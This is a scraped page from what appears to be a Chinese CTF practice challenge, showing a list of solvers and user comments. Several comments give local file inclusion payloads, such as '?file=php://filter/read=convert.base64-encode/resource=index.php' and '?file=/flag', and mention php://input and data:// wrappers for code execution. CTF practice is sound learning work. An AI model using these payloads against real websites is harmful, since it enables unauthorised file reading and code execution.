评分(11)
解题动态
warm007 攻破了该题 22分钟前
ccxxxc 攻破了该题 3小时前
cfx 攻破了该题 4小时前
panzhang 攻破了该题 7小时前
wen yi 攻破了该题 11小时前
鱼以为笙 攻破了该题 14小时前
y-123456 攻破了该题 14小时前
gdrhdr 攻破了该题 15小时前
怎么都吃不饱 攻破了该题 1天前
Lxiaoxu 攻破了该题 1天前
zzasas 攻破了该题 1天前
Alkaid02 攻破了该题 2天前
idle1 攻破了该题 2天前
junzhongshi 攻破了该题 2天前
ljy1997 攻破了该题 2天前
1fengxinye 攻破了该题 3天前
xcp 攻破了该题 3天前
57 攻破了该题 3天前
226677 攻破了该题 3天前
评论
SxPeng 22天前
举报
flag{******}
kitniu 1月前
举报
?file=/flag ,查看源代码
mkmkm 1月前
举报
flag{***}
Ywctf 5月前
举报
/?file=php://filter/read=convert.base64-encode/resource=index.php
帅帅123 6月前
举报
发现参数?file= 怀疑是文件读取或者目录穿越 尝试php为协议 命令执行:php://input data://text/plain,<?php ?> 字节流编码读取: php://filter/conver.base64-encode/resource=index.php
奔跑的开开 6月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
ok了 8月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php 秒了
VVang 8月前
举报
用php://filter包含index.php,然后base64解码得到flag
聪10011 9月前
举报
猜flag位置,file=/flag
8208240204 9月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php 然后发现==表明是base64解码得到flag